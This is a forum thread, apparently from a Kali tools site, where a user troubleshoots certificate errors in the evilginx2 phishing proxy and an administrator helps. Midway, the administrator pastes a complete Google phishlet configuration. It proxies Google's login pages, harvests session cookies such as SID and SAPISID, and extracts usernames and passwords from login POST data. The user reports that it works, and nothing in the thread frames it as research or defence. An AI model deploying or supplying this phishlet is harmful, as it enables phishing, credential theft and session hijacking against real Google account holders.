Hi! Letsencrypt больше не дает работать с ACMEv1 новым доменам и теперь в Evilginx2 не ставится SSL сертификат -- acme: Error 403 - urn: acme: error: unauthorized - Account creation on ACMEv1 is disabled. Please upgrade your ACME client to a version that supports ACMEv2 / RFC 8555. See удаленная ссылка for details Все issues по этому вопросу у kgertzky --> 404. Есть какой нибудь выход?
Эту ошибку исправили давно, четыре месяца назад — 11 октября 2019 года в версии evilginx2 2.3.2. То есть просто переустановите evilginx2 на новую и всё должно заработать. Инструкция по установке есть здесь: https://kali.tools/?p=4761
Здесь можно посмотреть журнал изменений: https://github.com/kgretzky/evilginx2/blob/master/CHANGELOG
2.3.3
- Fixed: Multiple concurrent map writes when whitelisting IPs during heavy loads.
2.3.2
- ACMEv2 support added to comply with LetsEncrypt requirements. - добавлена поддержка ACMEv2 для соблюдения требований LetsEncrypt
- Fixed session cookie output to support EditThisCookie on the latest Chrome version.
- Increased timeouts for proxying HTTP packets to 45 seconds.
- Added support for Go modules.
Спасибо большое! Но если ставить по инструкции на kali tools то он ставит 2.3.0. А может быть такое что надо компилировать чтобы поднять версию? Installing from source ---> Instructions above can also be used to update evilginx2 to the latest version. а если Installing from precompiled binary packages ---> то ссылка ведет на 2.3.0 zip. Простите я может что-то упускаю.
Вы всё верно заметили, поскольку установка делается из предварительно скомпилированного файла со страницы https://github.com/kgretzky/evilginx2/releases , а там, как можно увидеть, автор не выкладывает новые файлы.
Сейчас добавлю инструкцию по установке из исходного кода — в этом случае установится последняя версия. После этого ещё раз напишу здесь на форуме.
Всё готово, сюда: https://kali.tools/?p=4761 добавил новые команды — перейдите к разделу «Установка из исходного кода».
Ещё раз спасибо, что обратили внимание на проблему — до меня не сразу дошло, что автор забыл выложить исполнимые файлы для последних релизов.
Спасибо большое!
Простите пожалуйста тут еще один момент - Может я ошибаюсь но дорога теперь чтобы загружать дополнительные фишлеты другая, если версия 2.3.0. команда mv phishlets-master/* phishlets/ работала то с версией 2.3.3 нет. Они вроде как теперь хранятся тут /usr/share/evilginx/phishlets/ Но вопрос в другом я в дополнительный phishlets поставил Google но он категорически отказывался запускаться. В readme я нашел что для google нужно чтобы домен был американский, если я не ошибаюсь стояла гораздо ниже версия Evilginx двухлетней давности, и что -то про прокси но предложение на половине обрывается. Я так понимаю если старая версия Evilginx будет проблема с LetsEncrypt. Есть какая нибудь возможность решить эту проблему? Спасибо
Да, при установке из исходного кода фишлеты хранятся по пути /usr/share/evilginx/phishlets.
Для Google я видел только фишлеты в формате старой версии evilginx2. Думаю, проблема именно в несовместимости версий, а не в домене.
Сам я не вникал в разработку фишлетов, поэтому не могу помочь. Нужно или искать актуальный для Google или просить сообщество сделать.
Кстати, есть не принятый запрос на внесение изменения в код: https://github.com/kgretzky/evilginx2/pull/315
Среди прочего, там создаётся файл phishlets/google.yaml со следующим содержимым:
name: 'google'
author: '@GregorioSecurity'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
- {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: true, is_landing: false}
sub_filters:
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="://{hostname}', replace: 'href="https://ssl.{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
auth_tokens:
- domain: '.google.com'
keys: ['SID', 'HSID', 'SSID', 'APISID', 'SAPISID', 'NID','CGIC','SNID', 'LSID','1P_JAR',]
- domain: 'accounts.google.com'
keys: ['GAPS', 'LSID']
credentials:
username:
key: 'f.req'
search: '\[*\[\"(.+?)\"'
type: 'post'
password:
key: 'f.req'
search: '\[.*\[\"(.+?)\"'
type: 'post'
login:
domain: 'accounts.google.com'
path: '/signin/v2/identifier'
path: '/ServiceLogin/identifier'
Сам я не тестировал, но есть шанс, что заработает.
Опять большое вам спасибо! Все заработало.
Hi,
I want to take a moment and say thank you for this great info.
Did the phishlet work as intended ?
Thank you for your response
Hello i did all the step of install and i steal have
ERROR 403 - urn: acme: error: unauthorized - Account creation on ACMEv1 is disabled. Please upgrade your ACME client to a version that supports ACMEv2 / RFC 8555
1- I use Digitaloceans server
2-I got my domain in freenom.com
@rayanv4, for installation please consider the following article: ‘How to install evilginx2 (and how to fix ‘urn: acme: error: unauthorized - Account creation on ACMEv1 is disabled’)’.